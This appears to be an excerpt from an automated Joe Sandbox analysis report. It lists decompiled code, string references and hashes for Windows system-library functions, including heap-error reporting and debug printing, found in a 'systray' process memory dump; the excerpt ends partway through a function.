*** Inpage error in %ws:%s, xrefs: 0464B418
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0464B323
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0464B47D
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0464B484

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 28369ff9c46ee613415c70872de0a87448a3d538ba887cacb240831d78fd5218
Instruction ID: 1d06200253cb5aa9ce0568c08b0b76cc7f9d697b1fa6d35d45ab548b3a28ae7e
Opcode Fuzzy Hash: 28369ff9c46ee613415c70872de0a87448a3d538ba887cacb240831d78fd5218
Instruction Fuzzy Hash: 7A81F275A40210FFEF26AE05CC46E7B3B76AF96B55F004048F105AB256F661F402EEB6

Uniqueness

Uniqueness Score: -1.00%

Function 04651C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04651C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x45748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0459B150();
				} else {
					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x468589c);
				E0459B150("Heap error detected at %p (heap handle %p)\n",  *0x46858a0);
				_t27 =  *0x4685898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04651E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0459B150();
				} else {
					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0459B150("Error code: %d - %s\n",  *0x4685898);
				_t113 =  *0x46858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0459B150();
					} else {
						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0459B150("Parameter1: %p\n",  *0x46858a4);
				}
				_t115 =  *0x46858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0459B150();
					} else {
						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0459B150("Parameter2: %p\n",  *0x46858a8);
				}
				_t117 =  *0x46858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0459B150();
					} else {
						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0459B150("Parameter3: %p\n",  *0x46858ac);
				}
				_t119 =  *0x46858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0459B150();
					} else {
						E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x46858b4);
					E0459B150("Last known valid blocks: before - %p, after - %p\n",  *0x46858b0);
				} else {
					_t120 =  *0x46858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0459B150();
				} else {
					E0459B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0459B150("Stack trace available at %p\n", 0x46858c0);
			}

0x04651c10
0x04651c16
0x04651c1e
0x04651c3d
0x04651c3e
0x04651c20
0x04651c35
0x04651c3a
0x04651c44
0x04651c55
0x04651c5a
0x04651c65
0x04651c67
0x00000000
0x04651c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04651c67
0x04651cdc
0x04651ce5
0x04651d04
0x04651d05
0x04651ce7
0x04651cfc
0x04651d01
0x04651d0b
0x04651d17
0x04651d1f
0x04651d25
0x04651d30
0x04651d4f
0x04651d50
0x04651d32
0x04651d47
0x04651d4c
0x04651d61
0x04651d67
0x04651d68
0x04651d6e
0x04651d79
0x04651d98
0x04651d99
0x04651d7b
0x04651d90
0x04651d95
0x04651daa
0x04651db0
0x04651db1
0x04651db7
0x04651dc2
0x04651de1
0x04651de2
0x04651dc4
0x04651dd9
0x04651dde
0x04651df3
0x04651df9
0x04651dfa
0x04651e00
0x04651e0a
0x04651e13
0x04651e32
0x04651e33
0x04651e15
0x04651e2a
0x04651e2f
0x04651e39
0x04651e4a
0x04651e02
0x04651e02
0x04651e08
0x00000000
0x00000000
0x04651e08
0x04651e5b
0x04651e7a
0x04651e7b
0x04651e5d
0x04651e72
0x04651e77
0x04651e95

Strings

heap_failure_virtual_block_corruption, xrefs: 04651C91
Last known valid blocks: before - %p, after - %p, xrefs: 04651E45
Error code: %d - %s, xrefs: 04651D12
heap_failure_internal, xrefs: 04651C6E
heap_failure_buffer_overrun, xrefs: 04651C98
Parameter3: %p, xrefs: 04651DEE
heap_failure_lfh_bitmap_mismatch, xrefs: 04651CD7
heap_failure_buffer_underrun, xrefs: 04651C9F
heap_failure_entry_corruption, xrefs: 04651C83
Parameter2: %p, xrefs: 04651DA5
Heap error detected at %p (heap handle %p), xrefs: 04651C50
Stack trace available at %p, xrefs: 04651E86
HEAP: , xrefs: 04651C16, 04651C3D, 04651D04, 04651D4F, 04651D98, 04651DE1, 04651E32, 04651E7A
heap_failure_block_not_busy, xrefs: 04651CA6
heap_failure_freelists_corruption, xrefs: 04651CC9
heap_failure_multiple_entries_corruption, xrefs: 04651C8A
Parameter1: %p, xrefs: 04651D5C
heap_failure_unknown, xrefs: 04651C75
heap_failure_cross_heap_operation, xrefs: 04651CC2
heap_failure_listentry_corruption, xrefs: 04651CD0
heap_failure_invalid_allocation_type, xrefs: 04651CB4
HEAP[%wZ]: , xrefs: 04651C30, 04651CF7, 04651D42, 04651D8B, 04651DD4, 04651E25, 04651E6D
heap_failure_usage_after_free, xrefs: 04651CBB
heap_failure_generic, xrefs: 04651C7C
heap_failure_invalid_argument, xrefs: 04651CAD

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 36a456dd0b0005373a66f43bdf21c2a768d66ee460223fbe480e66042293def4
Instruction ID: b5fb8001a63ec778d15130e95bbaa80269ddd6083c93f6f2bfb187ec31267674
Opcode Fuzzy Hash: 36a456dd0b0005373a66f43bdf21c2a768d66ee460223fbe480e66042293def4
Instruction Fuzzy Hash: A961B572A51155EFE711A744E445B6473F4FB06A30F09442EF80AAB331FA68BD41FE0A

Uniqueness

Uniqueness Score: -1.00%

Function 045BB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E045BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x468d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E045B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04668CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E045D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E045DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E045DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E045B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04668F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E045DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4688628; // 0x0
								_v68 = _t77;
								_t78 =  *0x468862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4688628; // 0x0
							_t116 =  *0x468862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x045bb94c
0x045bb956
0x045bb95c
0x045bb95e
0x045bb964
0x045bb969
0x045bb96d
0x045bb96d
0x045bb970
0x045bb974
0x045bb97a
0x045bbadf
0x045bbadf
0x045bbae2
0x045bbae4
0x045bbae6
0x045bbaf0
0x04602cb8
0x045bbaf6
0x045bbaf6
0x045bbaf6
0x045bbafd
0x045bbb1f
0x045bbb1f
0x045bbaff
0x045bbb00
0x045bbb00
0x045bbb03
0x045bbb03
0x045bbacb
0x045bbacf
0x045bbad0
0x045bbad1
0x045bbadc
0x045bbadc
0x045bb980
0x045bb980
0x045bb988
0x045bb98b
0x045bb98d
0x045bb990
0x045bb993
0x045bb999
0x045bb99b
0x045bb9a1
0x045bb9a5
0x045bb9aa
0x045bb9b0
0x045bb9bb
0x045bb9c0
0x045bb9c3
0x045bb9ca
0x045bb9cc
0x045bb9cf
0x045bb9d3
0x045bb9d7
0x045bba94
0x045bba94
0x045bba98
0x045bbaa3
0x04602ccb
0x045bbaa9
0x045bbaa9
0x045bbaa9
0x045bbab1
0x04602cd5
0x04602cdd
0x04602cdd
0x045bbabb
0x045bbabc
0x045bbac2
0x045bbac3
0x045bbac3
0x045bbac6
0x00000000
0x045bb9dd
0x045bb9dd
0x045bb9e7
0x045bb9e7
0x045bb9ec
0x045bb9ec
0x045bb9f1
0x045bb9f5
0x045bb9fa
0x045bba00
0x045bba0c
0x045bba10
0x045bba10
0x045bba12
0x045bba18
0x00000000
0x00000000
0x045bbb26
0x045bbb26
0x045bba1e
0x045bba1e
0x045bba23
0x045bba25
0x045bba2c
0x045bba30
0x045bba35
0x045bba35
0x045bba41
0x045bba46
0x045bba4c
0x045bba50
0x045bba54
0x045bba6a
0x045bba6e
0x045bba70
0x045bba74
0x045bba78
0x045bba7a
0x045bba7c
0x045bba8e
0x045bba90
0x045bba92
0x045bbb14
0x045bbb14
0x045bbb16
0x045bbb16
0x00000000
0x045bba7c
0x045bbb0a
0x045bbb0d
0x00000000
0x00000000
0x00000000
0x045bbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045BB9A5

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 65b56f443506f9f606c3f0d0cf52be988f87eaa358d36617a7fa2a58edc60622
Instruction ID: cb01e2cd89c0d5d03167cb64fc344cb0766deb8a9a69534b67e895e1facec09b
Opcode Fuzzy Hash: 65b56f443506f9f606c3f0d0cf52be988f87eaa358d36617a7fa2a58edc60622
Instruction Fuzzy Hash: 215155B1A08301DFC724DF28C48092ABBE5FB88644F64896EE9C587744E7B1F844DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0459B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0459B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x466f7a8);
				E045ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E045ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E045DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E045DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L045EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E045DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E045DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E045DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E045DA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0459b171
0x0459b171
0x0459b171
0x0459b171
0x0459b171
0x0459b176
0x0459b17b
0x0459b180
0x0459b186
0x0459b18f
0x0459b198
0x0459b1a4
0x0459b1aa
0x045f4802
0x045f4802
0x045f4805
0x045f480c
0x045f480e
0x0459b1d1
0x0459b1d3
0x0459b1de
0x0459b1de
0x045f4817
0x045f481e
0x045f4820
0x045f4822
0x045f4822
0x045f4824
0x045f4824
0x045f482a
0x00000000
0x00000000
0x045f4835
0x045f483a
0x045f483d
0x045f483f
0x045f4842
0x045f4842
0x045f4842
0x045f4846
0x045f484c
0x045f484e
0x045f4851
0x045f4851
0x045f4853
0x045f4854
0x045f4854
0x045f4858
0x045f485a
0x045f485a
0x045f485d
0x045f485f
0x045f4861
0x045f4861
0x045f4866
0x045f486b
0x045f486e
0x045f4871
0x045f4876
0x045f4876
0x045f4878
0x045f487b
0x045f4884
0x045f4884
0x00000000
0x045f487d
0x045f487d
0x045f4882
0x045f4889
0x045f4889
0x045f488f
0x045f4891
0x045f48e0
0x045f48e2
0x045f48e4
0x045f48e4
0x045f48e7
0x045f48e7
0x045f48ed
0x045f48f4
0x045f48f6
0x045f4951
0x045f4951
0x045f4953
0x045f4953
0x045f4956
0x045f4956
0x045f4958
0x045f4959
0x045f4959
0x045f495d
0x045f495d
0x045f495f
0x045f495f
0x045f4965
0x045f4969
0x045f49ba
0x045f49ba
0x045f49c1
0x045f49c5
0x045f49cc
0x045f49d4
0x045f49d7
0x045f49da
0x045f49e4
0x045f49e5
0x045f49f3
0x045f4a02
0x00000000
0x045f4a02
0x045f4972
0x045f4974
0x00000000
0x00000000
0x045f4976
0x045f4979
0x045f4982
0x045f4983
0x045f4984
0x045f498b
0x045f498d
0x045f4991
0x045f4993
0x045f4999
0x045f499d
0x045f49a2
0x045f49a2
0x045f49a2
0x045f4999
0x045f49ac
0x00000000
0x045f49b3
0x045f48f8
0x045f48fe
0x00000000
0x00000000
0x00000000
0x045f48fe
0x045f4895
0x045f489c
0x045f48ad
0x045f48b2
0x045f48b5
0x045f48b7
0x045f48ba
0x045f48bc
0x045f48c6
0x045f48c6
0x045f48cb
0x045f48d1
0x045f48d4
0x045f48d8
0x045f48d8
0x00000000
0x045f48d8
0x045f48be
0x045f48c0
0x00000000
0x00000000
0x045f48c2
0x00000000
0x00000000
0x00000000
0x045f48c4
0x00000000
0x045f4882
0x045f487b
0x045f4904
0x045f4906
0x00000000
0x00000000
0x045f4908
0x045f490e
0x00000000
0x00000000
0x045f4910
0x045f4917
0x045f4917
0x00000000
0x045f4917
0x0459b1ba
0x045f47f9
0x045f47fc
0x00000000
0x00000000
0x00000000
0x045f47fc
0x0459b1c0
0x0459b1c0
0x0459b1c3
0x0459b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 045F48AD

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 761eaa09e4b0f0a216a682a54a8d2cc1a427e74e45422a6810c3b34f0afa9a9c
Instruction ID: 876b5226aacb47c7a1e29aa672802239090495815a4499959c241d6d5976e03a
Opcode Fuzzy Hash: 761eaa09e4b0f0a216a682a54a8d2cc1a427e74e45422a6810c3b34f0afa9a9c
Instruction Fuzzy Hash: 3851F171E0025A8EEF34CF68D944BBEBBB0BF52314F1041ADD959AB281D7306941AB82

Uniqueness

Uniqueness Score: -1.00%

Function 04592D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04592D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
